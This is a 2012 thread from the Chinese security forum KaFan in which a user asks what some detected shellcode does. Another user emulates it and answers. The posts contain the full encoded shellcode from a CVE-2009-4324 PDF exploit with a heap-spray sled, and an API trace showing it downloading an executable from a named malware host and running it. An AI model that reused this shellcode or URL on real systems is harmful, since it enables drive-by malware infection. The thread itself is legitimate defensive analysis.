收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 有分析 ShellCode 的么
返回列表 发新帖
查看: 1454|回复: 2
收起左侧

[已鉴定] 有分析 ShellCode 的么

 关闭 [复制链接]
hx1997
发表于 2012-5-12 14:23:16 | 显示全部楼层 |阅读模式
本帖最后由 疯狂的小鬼 于 2012-5-12 19:48 编辑

What's this?

  2. //warning CVE-NO-MATCH Shellcode Engine Binary Threshold

  4. //warning CVE-NO-MATCH Shellcode Engine Length 65536
  5. //warning CVE-2009-4324 printd access
  6. //warning CVE-2009-4324 printd access
  7. //alert CVE-2009-4324 media.newPlayer with NULL parameter
  8. //warning CVE-2009-4324 printd access
  9. //shellcode len 200 (including any NOPs) qdxIsPARawijkD = %uC3DB%u74D9%uF424%u3158%uBBC9%uB4E1%u9CA2%u5EB1%u5831%u8318%u04C0%u5803%u56F5%u7757%uCCE5%uBBD2%u97CC%u875B%uD7CF%uF2A8%u3556%uE92A%u526D%u1120%u5D92%uA2C7%u3BF5%uF8B1%u04F8%u676B%uEC9B%u4179%u1C0E%uF497%u3304%u66BE%u7276%u6352%u66D3%uF4BF%u1DFA%uE955%u981B%u6F30%u0CF1%uDAC9%u7D81%uD21C%u247B%u813B%u4369%uD1CF%uF94D%u3310%u3EDC%uD1A8%u2380%u9DE9%u9C4C%uA5D4%u48BE%uF6CB%uEA03%u40B1%u9103%uFB1E%u5AA3%u6A8C%u7A51%u1634%uDC0F%uBC4F%u8435%u5BBD%u6FD3%u38D0%uE1F1%uE1CE%uEF62%uEEA7%uD011%uD849%u48B0%uC030%uFE9D%u3A88%u3147%u066B%u8C95%u1087%u7F59%uB8CC%u19C0%uE416%uD678%u03F8%uF0DB%u57EA%uAC3A%u50EA%uC726%u4DB5%uD413%uBB7F%uD4FD%u62F5%u739C%u6230%u7F29%u4EE5%u1DCF%u8DFB%u8476%u3456%u7E41%u086C%uE798%uF2BF%uAD08%u37F6%uE34A%u0160%u35F4%u3B1F%uFCA1%u62FC%u9FBD%u5F34%uAAF2%u2BA3%uEBCF%uD71E%u41B8%u7D07%u2937%uE7DE%u8BD1%u05E3%uDFD4%u2CEA%uE23E%u3AEE%uF742%u24FB%uF464%u9C11%uEF78%uDD07%u2D8C%uF527%u3490%uFC25%u2983%u986E%u5A9D%u4778%u67C0%uE17D%u79DE%uFF72%u8813%uFC98%u9653%u28C6%u9155%u0704%u9969%u501C%uBE62%u383B%uD498%uCF49%uDC96%uFC2B%uF69D%u0B91%u0ECF%u02DC%u0CF7%u1DD2%u1FD8%u1D18%u463E%uAA8B%u09CA%u7C76%u9D1D%uF5F1%u1B4F%u8C9B%uEFFC%u1906%u6267%u8BE7%uF602%u30D8%u9AAD%u9945%u1B48%u65EF
  10. //warning CVE-NO-MATCH Shellcode NOP len 32560
  11. //shellcode len 32568 (including any NOPs) EdDashDIgmMARzTFDgSvTTZUlJuZmRU = %u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
  12. //shellcode len 36 (including any NOPs) TyhHR = %u0C0C%u0C0C%u4367%u6345%u6958%u6C69%u5859%u704E%u444D%u594F%u784E%u6353%u5457%u784E%u6972%u7265%u5A7A%u6852%u5157%u6D62%u6879%u6C77%u6E55%u5356%u7242%u6648%u456B%u6A58%u6F79%u7A45%u7874%u5456%u6C66%u7844%u764B%u6574
  13. //warning CVE-NO-MATCH Shellcode NOP len 9999
  14. //shellcode len 268443647 (including any NOPs) memory = %u0C0C
复制代码
回复

举报

帅就是帅
发表于 2012-5-12 17:33:14 | 显示全部楼层
样本地址在 qdxIsPARawijkD 中: http://www.zeus4ever.net/calc.exe

  1. <Profile>
  2. FARPROC WINAPI GetProcAddress (
  3.      HMODULE hModule = 0x7c800000 =>
  4.          none;
  5.      LPCSTR lpProcName = 0x00417120 =>
  6.            = "GetSystemDirectoryA";
  7. ) = 0x7c814eea;
  8. FARPROC WINAPI GetProcAddress (
  9.      HMODULE hModule = 0x7c800000 =>
  10.          none;
  11.      LPCSTR lpProcName = 0x00417134 =>
  12.            = "WinExec";
  13. ) = 0x7c86136d;
  14. FARPROC WINAPI GetProcAddress (
  15.      HMODULE hModule = 0x7c800000 =>
  16.          none;
  17.      LPCSTR lpProcName = 0x0041713c =>
  18.            = "ExitThread";
  19. ) = 0x7c80c058;
  20. FARPROC WINAPI GetProcAddress (
  21.      HMODULE hModule = 0x7c800000 =>
  22.          none;
  23.      LPCSTR lpProcName = 0x00417147 =>
  24.            = "LoadLibraryA";
  25. ) = 0x7c801d77;
  26. HMODULE LoadLibraryA (
  27.      LPCTSTR lpFileName = 0x00417154 =>
  28.            = "urlmon";
  29. ) = 0x7df20000;
  30. FARPROC WINAPI GetProcAddress (
  31.      HMODULE hModule = 0x7df20000 =>
  32.          none;
  33.      LPCSTR lpProcName = 0x0041715b =>
  34.            = "URLDownloadToFileA";
  35. ) = 0x7df7b0bb;
  36. UINT GetSystemDirectory (
  37.      LPTSTR lpBuffer = 0x00416fb2 =>
  38.            = "c:\WINDOWS\system32";
  39.      UINT uSize = 32;
  40. ) =  19;
  41. HRESULT URLDownloadToFile (
  42.      LPUNKNOWN pCaller = 0x00000000 =>
  43.          none;
  44.      LPCTSTR szURL = 0x0041716e =>
  45.            = "http://www.zeus4ever.net/calc.exe";
  46.      LPCTSTR szFileName = 0x00416fb2 =>
  47.            = "c:\WINDOWS\system32\a.exe";
  48.      DWORD dwReserved = 0;
  49.      LPBINDSTATUSCALLBACK lpfnCB = 0;
  50. ) =  0;
  51. UINT WINAPI WinExec (
  52.      LPCSTR lpCmdLine = 0x00416fb2 =>
  53.            = "c:\WINDOWS\system32\a.exe";
  54.      UINT uCmdShow = 0;
  55. ) =  32;
  56. void ExitThread (
  57.      DWORD dwExitCode = 32;
  58. ) =  0;
复制代码

评分

参与人数 1人气 +1 收起 理由
hx1997 + 1 感谢解答: )

查看全部评分

回复

举报

yaofang1989
头像被屏蔽
发表于 2012-5-12 17:46:27 | 显示全部楼层
进不去了。。
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-1 16:53 , Processed in 0.126711 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表